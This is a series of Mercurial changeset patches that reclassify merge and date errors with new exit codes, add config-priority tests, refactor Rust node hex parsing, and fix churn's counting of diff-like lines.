7680565497374b00e832a1917065b9afec6b9f25 errors: use StateError more in merge module Differential Revision: https://phab.mercurial-scm.org/D9912 diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -233,7 +233,7 @@ else: warn(_(b"%s: untracked file differs\n") % f) if abortconflicts: - raise error.Abort( + raise error.StateError( _( b"untracked files in working directory " b"differ from files in requested revision" @@ -341,7 +341,7 @@ for f in pmmf: fold = util.normcase(f) if fold in foldmap: - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and %s") % (f, foldmap[fold]) ) @@ -352,7 +352,7 @@ for fold, f in sorted(foldmap.items()): if fold.startswith(foldprefix) and not f.startswith(unfoldprefix): # the folded prefix matches but actual casing is different - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and directory of %s") % (lastfull, f) ) @@ -504,7 +504,9 @@ if invalidconflicts: for p in invalidconflicts: repo.ui.warn(_(b"%s: is both a file and a directory\n") % p) - raise error.Abort(_(b"destination manifest contains path conflicts")) + raise error.StateError( + _(b"destination manifest contains path conflicts") + ) def _filternarrowactions(narrowmatch, branchmerge, mresult): @@ -1918,10 +1920,10 @@ ### check phase if not overwrite: if len(pl) > 1: - raise error.Abort(_(b"outstanding uncommitted merge")) + raise error.StateError(_(b"outstanding uncommitted merge")) ms = wc.mergestate() if ms.unresolvedcount(): - raise error.Abort( + raise error.StateError( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), ) @@ -2007,7 +2009,7 @@ if mresult.hasconflicts(): msg = _(b"conflicting changes") hint = _(b"commit or update --clean to discard changes") - raise error.Abort(msg, hint=hint) + raise error.StateError(msg, hint=hint) # Prompt and create actions. Most of this is in the resolve phase # already, but we can't handle .hgsubstate in filemerge or diff --git a/tests/test-audit-subrepo.t b/tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t +++ b/tests/test-audit-subrepo.t @@ -323,7 +323,7 @@ new changesets 7a2f0e59146f .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat main5/.hg/hgrc | grep pwned [1] @@ -623,7 +623,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls "$FAKEHOME" a $ test -d "$FAKEHOME/.hg" @@ -652,7 +652,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls -A "$FAKEHOME" .hg a diff --git a/tests/test-largefiles.t b/tests/test-largefiles.t --- a/tests/test-largefiles.t +++ b/tests/test-largefiles.t @@ -1751,7 +1751,7 @@ $ hg rm sub2/large6 $ hg up -r. abort: outstanding uncommitted merge - [255] + [20] - revert should be able to revert files introduced in a pending merge $ hg revert --all -r . diff --git a/tests/test-merge-remove.t b/tests/test-merge-remove.t --- a/tests/test-merge-remove.t +++ b/tests/test-merge-remove.t @@ -95,7 +95,7 @@ $ hg merge bar: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat bar memories of buried pirate treasure diff --git a/tests/test-merge1.t b/tests/test-merge1.t --- a/tests/test-merge1.t +++ b/tests/test-merge1.t @@ -113,7 +113,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] #if symlink symlinks to directories should be treated as regular files (issue5027) @@ -122,7 +122,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] symlinks shouldn't be followed $ rm b $ echo This is file b1 > .hg/b @@ -130,7 +130,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b $ echo This is file b2 > b @@ -144,7 +144,7 @@ $ hg merge 1 --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] this merge should warn $ hg merge 1 --config merge.checkunknown=warn @@ -188,7 +188,7 @@ $ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort remoteignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore merging .hgignore merging for .hgignore @@ -210,15 +210,15 @@ b: untracked file differs localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn b: replacing untracked file localignored: replacing untracked file diff --git a/tests/test-pathconflicts-basic.t b/tests/test-pathconflicts-basic.t --- a/tests/test-pathconflicts-basic.t +++ b/tests/test-pathconflicts-basic.t @@ -53,7 +53,7 @@ $ hg up file a: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up --clean file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (activating bookmark file) diff --git a/tests/test-pathconflicts-update.t b/tests/test-pathconflicts-update.t --- a/tests/test-pathconflicts-update.t +++ b/tests/test-pathconflicts-update.t @@ -49,7 +49,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -70,7 +70,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -89,7 +89,7 @@ $ hg up file a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up file --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -107,7 +107,7 @@ $ hg up link a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up link --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -180,7 +180,7 @@ x: untracked file differs 3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob) abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg revert --all # Test batch fetching of lookup files during hg status diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -110,7 +110,7 @@ $ hg merge 2 b/c: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat b/c target but it should succeed if the content matches diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -153,15 +153,15 @@ $ hg up 0 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge --force 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] set up conflict-free merge diff --git a/tests/test-up-local-change.t b/tests/test-up-local-change.t --- a/tests/test-up-local-change.t +++ b/tests/test-up-local-change.t @@ -175,7 +175,7 @@ $ hg up 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b test conflicting untracked ignored file @@ -195,7 +195,7 @@ $ hg up 'desc("add ignored file")' ignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] test a local add diff --git a/tests/test-update-branches.t b/tests/test-update-branches.t --- a/tests/test-update-branches.t +++ b/tests/test-update-branches.t @@ -324,7 +324,7 @@ $ hg up -q 4 abort: conflicting changes (commit or update --clean to discard changes) - [255] + [20] $ hg up -m 4 merging a warning: conflicts while merging a! (edit, then use 'hg resolve --mark') # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611966413 28800 # Fri Jan 29 16:26:53 2021 -0800 # Node ID 6894c9ef4dcd3511c9baf7cdce72a65b4385ccc8 # Parent dc00324e80f41ec5f5a7c4dc36b5c7af2390fda5 errors: use InputError for incorrectly formatted dates Differential Revision: https://phab.mercurial-scm.org/D9913 diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -68,7 +68,9 @@ timestamp = time.time() if timestamp < 0: hint = _(b"check your clock") - raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint) + raise error.InputError( + _(b"negative timestamp: %d") % timestamp, hint=hint + ) delta = datetime.datetime.utcfromtimestamp( timestamp ) - datetime.datetime.fromtimestamp(timestamp) @@ -328,24 +330,26 @@ date = date.strip() if not date: - raise error.Abort(_(b"dates cannot consist entirely of whitespace")) + raise error.InputError( + _(b"dates cannot consist entirely of whitespace") + ) elif date[0:1] == b"<": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '<DATE'")) + raise error.InputError(_(b"invalid day spec, use '<DATE'")) when = upper(date[1:]) return lambda x: x <= when elif date[0:1] == b">": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '>DATE'")) + raise error.InputError(_(b"invalid day spec, use '>DATE'")) when = lower(date[1:]) return lambda x: x >= when elif date[0:1] == b"-": try: days = int(date[1:]) except ValueError: - raise error.Abort(_(b"invalid day spec: %s") % date[1:]) + raise error.InputError(_(b"invalid day spec: %s") % date[1:]) if days < 0: - raise error.Abort( + raise error.InputError( _(b"%s must be nonnegative (see 'hg help dates')") % date[1:] ) when = makedate()[0] - days * 3600 * 24 diff --git a/tests/test-parse-date.t b/tests/test-parse-date.t --- a/tests/test-parse-date.t +++ b/tests/test-parse-date.t @@ -103,43 +103,43 @@ $ hg log -d "--2" abort: -2 must be nonnegative (see 'hg help dates') - [255] + [10] Whitespace only $ hg log -d " " abort: dates cannot consist entirely of whitespace - [255] + [10] Test date formats with '>' or '<' accompanied by space characters $ hg log -d '>' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '<' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' >' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' <' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '> ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '< ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' > ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' < ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '>02/01' --template '{date|date}\n' $ hg log -d '<02/01' --template '{date|date}\n' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611916947 -3600 # Fri Jan 29 11:42:27 2021 +0100 # Node ID 4ae85340d5ebdb2e04f091bafdb1b581609e9489 # Parent 6894c9ef4dcd3511c9baf7cdce72a65b4385ccc8 config: add a test for priority when includes are involved Differential Revision: https://phab.mercurial-scm.org/D9915 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -388,3 +388,26 @@ > done $ HGRCPATH=configs hg config section.key 99 + +Configuration priority +====================== + +setup necessary file + + $ cat > file-A.rc << EOF + > [config-test] + > basic = value-A + > EOF + + $ cat > file-B.rc << EOF + > [config-test] + > basic = value-B + > EOF + +Simple order checking +--------------------- + +If file B is read after file A, value from B overwrite value from A. + + $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic + value-B # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611917433 -3600 # Fri Jan 29 11:50:33 2021 +0100 # Node ID 9d49ae51aa56578c5eda94bbc3d400af13b9f7c4 # Parent 4ae85340d5ebdb2e04f091bafdb1b581609e9489 config: test priority involving include Differential Revision: https://phab.mercurial-scm.org/D9916 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -397,6 +397,9 @@ $ cat > file-A.rc << EOF > [config-test] > basic = value-A + > pre-include= value-A + > %include ./included.rc + > post-include= value-A > EOF $ cat > file-B.rc << EOF @@ -404,6 +407,13 @@ > basic = value-B > EOF + + $ cat > included.rc << EOF + > [config-test] + > pre-include= value-included + > post-include= value-included + > EOF + Simple order checking --------------------- @@ -411,3 +421,13 @@ $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic value-B + +Ordering from include +--------------------- + +value from an include overwrite value defined before the include, but not the one defined after the include + + $ HGRCPATH="file-A.rc" hg config config-test.pre-include + value-included + $ HGRCPATH="file-A.rc" hg config config-test.post-include + value-A # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611921830 -3600 # Fri Jan 29 13:03:50 2021 +0100 # Node ID 821775843caf16d957a2ef2b350e7f726b6742c1 # Parent 9d49ae51aa56578c5eda94bbc3d400af13b9f7c4 config: test priority involving the command line Differential Revision: https://phab.mercurial-scm.org/D9917 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -431,3 +431,9 @@ value-included $ HGRCPATH="file-A.rc" hg config config-test.post-include value-A + +command line override +--------------------- + + $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI + value-CLI # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611925381 -3600 # Fri Jan 29 14:03:01 2021 +0100 # Node ID 271dfcb98544fd05cc7e85cc180dc0cd9e7790cb # Parent 821775843caf16d957a2ef2b350e7f726b6742c1 config: use the right API to access subrepository section Preventing direct access to the underlying dict will help a coming refactoring of `config`. Differential Revision: https://phab.mercurial-scm.org/D9921 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -105,7 +105,7 @@ return src state = {} - for path, src in p[b''].items(): + for path, src in p.items(b''): kind = b'hg' if src.startswith(b'['): if b']' not in src: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611925419 -3600 # Fri Jan 29 14:03:39 2021 +0100 # Node ID 5272542196cc6d7ee05f33fe5abd9c006a964650 # Parent 271dfcb98544fd05cc7e85cc180dc0cd9e7790cb config: use the right API to access template access Preventing direct access to the underlying dict will help a coming refactoring of `config`. Differential Revision: https://phab.mercurial-scm.org/D9922 diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -891,7 +891,7 @@ fp = _open_mapfile(path) cache, tmap, aliases = _readmapfile(fp, path) - for key, val in conf[b'templates'].items(): + for key, val in conf.items(b'templates'): if not val: raise error.ParseError( _(b'missing value'), conf.source(b'templates', key) @@ -904,7 +904,7 @@ cache[key] = unquotestring(val) elif key != b'__base__': tmap[key] = os.path.join(base, val) - aliases.extend(conf[b'templatealias'].items()) + aliases.extend(conf.items(b'templatealias')) return cache, tmap, aliases # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611963414 -3600 # Sat Jan 30 00:36:54 2021 +0100 # Node ID f7621fa14b849ba79e6624beaff03b6a9e7d5592 # Parent 5272542196cc6d7ee05f33fe5abd9c006a964650 config: use the right API to access git-submodule Differential Revision: https://phab.mercurial-scm.org/D9923 diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -247,7 +247,8 @@ b'\n'.join(line.strip() for line in content.split(b'\n')), ) for sec in c.sections(): - s = c[sec] + # turn the config object into a real dict + s = dict(c.items(sec)) if b'url' in s and b'path' in s: self.submodules.append(submodule(s[b'path'], b'', s[b'url'])) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611924379 -3600 # Fri Jan 29 13:46:19 2021 +0100 # Node ID 0da465780bba420620809d2501510a282afbd8b9 # Parent f7621fa14b849ba79e6624beaff03b6a9e7d5592 rhg: Build in release mode on CI This follows e73b40c790ec which made tests use the release executable. With e73b40c790ec but not this, tests are skipped on CI because the executable is missing. Differential Revision: https://phab.mercurial-scm.org/D9907 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -32,7 +32,7 @@ - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - cd /tmp/mercurial-ci/rust/rhg - - cargo build + - cargo build --release - cd /tmp/mercurial-ci/ # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611572423 -3600 # Mon Jan 25 12:00:23 2021 +0100 # Node ID 6380efb821912f25177103bdeec40d536dd6f919 # Parent 0da465780bba420620809d2501510a282afbd8b9 rust: replace Node::encode_hex with std::fmt::LowerHex This avoids allocating intermediate strings. Differential Revision: https://phab.mercurial-scm.org/D9860 diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -66,7 +66,7 @@ .collect(); if queries < 10 { let nodes_hex: Vec<String> = - nodes.iter().map(|n| n.encode_hex()).collect(); + nodes.iter().map(|n| format!("{:x}", n)).collect(); println!("Nodes: {:?}", nodes_hex); } let mut last: Option<Revision> = None; @@ -76,11 +76,11 @@ } let elapsed = start.elapsed(); println!( - "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}", + "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}", queries, elapsed, elapsed / (queries as u32), - nodes.last().unwrap().encode_hex(), + nodes.last().unwrap(), last ); } diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -11,6 +11,7 @@ use bytes_cast::BytesCast; use hex::{self, FromHex, FromHexError}; use std::convert::TryFrom; +use std::fmt; /// The length in bytes of a `Node` /// @@ -80,6 +81,15 @@ } } +impl fmt::LowerHex for Node { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + for &byte in &self.data { + write!(f, "{:02x}", byte)? + } + Ok(()) + } +} + #[derive(Debug, PartialEq)] pub enum NodeError { ExactLengthRequired(usize, String), @@ -124,14 +134,6 @@ .into()) } - /// Convert to hexadecimal string representation - /// - /// To be used in FFI and I/O only, in order to facilitate future - /// changes of hash format. - pub fn encode_hex(&self) -> String { - hex::encode(self.data) - } - /// Provide access to binary data /// /// This is needed by FFI layers, for instance to return expected @@ -349,7 +351,7 @@ #[test] fn test_node_encode_hex() { - assert_eq!(sample_node().encode_hex(), sample_node_hex()); + assert_eq!(format!("{:x}", sample_node()), sample_node_hex()); } #[test] @@ -391,7 +393,7 @@ "testgr".to_string() )) ); - let mut long = NULL_NODE.encode_hex(); + let mut long = format!("{:x}", NULL_NODE); long.push('c'); match NodePrefix::from_hex(&long) .expect_err("should be refused as too long") # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611574119 -3600 # Mon Jan 25 12:28:39 2021 +0100 # Node ID 5893706af3decde7b3a63ec4b4fa188d02cddecb # Parent 6380efb821912f25177103bdeec40d536dd6f919 rust: Simplify error type for reading hex node IDs If a string is not valid hexadecimal it’s not that useful to track the precise reason. Differential Revision: https://phab.mercurial-scm.org/D9861 diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{Node, NodeError, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix, NodePrefixRef}; pub mod changelog; pub mod index; pub mod manifest; diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -9,7 +9,7 @@ //! of a revision. use bytes_cast::BytesCast; -use hex::{self, FromHex, FromHexError}; +use hex::{self, FromHex}; use std::convert::TryFrom; use std::fmt; @@ -47,10 +47,9 @@ /// if they need a loop boundary. /// /// All methods that create a `Node` either take a type that enforces -/// the size or fail immediately at runtime with [`ExactLengthRequired`]. +/// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired #[derive(Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { @@ -90,12 +89,8 @@ } } -#[derive(Debug, PartialEq)] -pub enum NodeError { - ExactLengthRequired(usize, String), - PrefixTooLong(String), - HexError(FromHexError, String), -} +#[derive(Debug)] +pub struct FromHexError; /// Low level utility function, also for prefixes fn get_nybble(s: &[u8], i: usize) -> u8 { @@ -128,9 +123,9 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|e| NodeError::from((e, hex)))? + .map_err(|_| FromHexError)? .into()) } @@ -143,19 +138,6 @@ } } -impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError { - fn from(err_offender: (FromHexError, T)) -> Self { - let (err, offender) = err_offender; - let offender = String::from_utf8_lossy(offender.as_ref()).into_owned(); - match err { - FromHexError::InvalidStringLength => { - NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender) - } - _ => NodeError::HexError(err, offender), - } - } -} - /// The beginning of a binary revision SHA. /// /// Since it can potentially come from an hexadecimal representation with @@ -175,31 +157,22 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); if len > NODE_NYBBLES_LENGTH { - return Err(NodeError::PrefixTooLong( - String::from_utf8_lossy(hex).to_owned().to_string(), - )); + return Err(FromHexError); } let is_odd = len % 2 == 1; let even_part = if is_odd { &hex[..len - 1] } else { hex }; let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|e| (e, hex))?; + Vec::from_hex(&even_part).map_err(|_| FromHexError)?; if is_odd { let latest_char = char::from(hex[len - 1]); - let latest_nybble = latest_char.to_digit(16).ok_or_else(|| { - ( - FromHexError::InvalidHexCharacter { - c: latest_char, - index: len - 1, - }, - hex, - ) - })? as u8; + let latest_nybble = + latest_char.to_digit(16).ok_or_else(|| FromHexError)? as u8; buf.push(latest_nybble << 4); } Ok(NodePrefix { buf, is_odd }) @@ -329,24 +302,15 @@ #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node())); + assert_eq!(Node::from_hex(&sample_node_hex()).unwrap(), sample_node()); let mut short = hex_pad_right("0123"); short.pop(); short.pop(); - assert_eq!( - Node::from_hex(&short), - Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)), - ); + assert!(Node::from_hex(&short).is_err()); let not_hex = hex_pad_right("012... oops"); - assert_eq!( - Node::from_hex(¬_hex), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: '.', index: 3 }, - not_hex, - )), - ); + assert!(Node::from_hex(¬_hex).is_err(),); } #[test] @@ -355,7 +319,7 @@ } #[test] - fn test_prefix_from_hex() -> Result<(), NodeError> { + fn test_prefix_from_hex() -> Result<(), FromHexError> { assert_eq!( NodePrefix::from_hex("0e1")?, NodePrefix { @@ -386,25 +350,14 @@ #[test] fn test_prefix_from_hex_errors() { - assert_eq!( - NodePrefix::from_hex("testgr"), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: 't', index: 0 }, - "testgr".to_string() - )) - ); + assert!(NodePrefix::from_hex("testgr").is_err()); let mut long = format!("{:x}", NULL_NODE); long.push('c'); - match NodePrefix::from_hex(&long) - .expect_err("should be refused as too long") - { - NodeError::PrefixTooLong(s) => assert_eq!(s, long), - err => panic!(format!("Should have been TooLong, got {:?}", err)), - } + assert!(NodePrefix::from_hex(&long).is_err()) } #[test] - fn test_is_prefix_of() -> Result<(), NodeError> { + fn test_is_prefix_of() -> Result<(), FromHexError> { let mut node_data = [0; NODE_BYTES_LENGTH]; node_data[0] = 0x12; node_data[1] = 0xca; @@ -417,7 +370,7 @@ } #[test] - fn test_get_nybble() -> Result<(), NodeError> { + fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; assert_eq!(prefix.borrow().get_nybble(0), 13); assert_eq!(prefix.borrow().get_nybble(7), 9); diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,7 +13,7 @@ //! is used in a more abstract context. use super::{ - node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision, + node::NULL_NODE, FromHexError, Node, NodePrefix, NodePrefixRef, Revision, RevlogIndex, NULL_REVISION, }; @@ -27,14 +27,14 @@ #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix(NodeError), + InvalidNodePrefix, /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<NodeError> for NodeMapError { - fn from(err: NodeError) -> Self { - NodeMapError::InvalidNodePrefix(err) +impl From<FromHexError> for NodeMapError { + fn from(_: FromHexError) -> Self { + NodeMapError::InvalidNodePrefix } } diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -18,7 +18,7 @@ use hg::{ nodemap::{Block, NodeMapError, NodeTree}, revlog::{nodemap::NodeMap, RevlogIndex}, - NodeError, Revision, + Revision, }; use std::cell::RefCell; @@ -468,17 +468,12 @@ match err { NodeMapError::MultipleResults => revlog_error(py), NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s), + NodeMapError::InvalidNodePrefix => { + PyErr::new::<ValueError, _>(py, "Invalid node or prefix") + } } } -fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr { - PyErr::new::<ValueError, _>( - py, - format!("Invalid node or prefix: {:?}", ne), - ) -} - /// Create the module, with __package__ given from parent pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> { let dotted_name = &format!("{}.revlog", package); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611574300 -3600 # Mon Jan 25 12:31:40 2021 +0100 # Node ID e61c2dc6e1c2fbbbc0a1402adfccbd50c0485f63 # Parent 5893706af3decde7b3a63ec4b4fa188d02cddecb rust: Exclude empty node prefixes We presumably don’t want `--rev ""` to select every single revision, even though the empty string is a prefix of all strings. Differential Revision: https://phab.mercurial-scm.org/D9862 diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -160,7 +160,7 @@ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); - if len > NODE_NYBBLES_LENGTH { + if len > NODE_NYBBLES_LENGTH || len == 0 { return Err(FromHexError); } @@ -201,10 +201,6 @@ } } - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - pub fn is_prefix_of(&self, node: &Node) -> bool { if self.is_odd { let buf = self.buf; # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1612002611 -28800 # Sat Jan 30 18:30:11 2021 +0800 # Node ID b84c3d43ff2ec1dee2cbb244af4d500bf8d24947 # Parent e61c2dc6e1c2fbbbc0a1402adfccbd50c0485f63 churn: count lines that look like diff headers but are not Previously, churn cannot count added lines that start with "++ " or removed lines that start with "-- ". Differential Revision: https://phab.mercurial-scm.org/D9929 diff --git a/hgext/churn.py b/hgext/churn.py --- a/hgext/churn.py +++ b/hgext/churn.py @@ -38,11 +38,16 @@ def changedlines(ui, repo, ctx1, ctx2, fmatch): added, removed = 0, 0 diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch)) + inhunk = False for l in diff.split(b'\n'): - if l.startswith(b"+") and not l.startswith(b"+++ "): + if inhunk and l.startswith(b"+"): added += 1 - elif l.startswith(b"-") and not l.startswith(b"--- "): + elif inhunk and l.startswith(b"-"): removed += 1 + elif l.startswith(b"@"): + inhunk = True + elif l.startswith(b"d"): + inhunk = False return (added, removed) diff --git a/tests/test-churn.t b/tests/test-churn.t --- a/tests/test-churn.t +++ b/tests/test-churn.t @@ -195,3 +195,22 @@ alltogether 11 ********************************************************* $ cd .. + +count lines that look like headings but are not + + $ hg init not-headers + $ cd not-headers + $ cat > a <<EOF + > diff + > @@ -195,3 +195,21 @@ + > -- a/tests/test-churn.t + > ++ b/tests/test-churn.t + > EOF + $ hg ci -Am adda -u user1 + adding a + $ hg churn --diffstat + user1 +4/-0 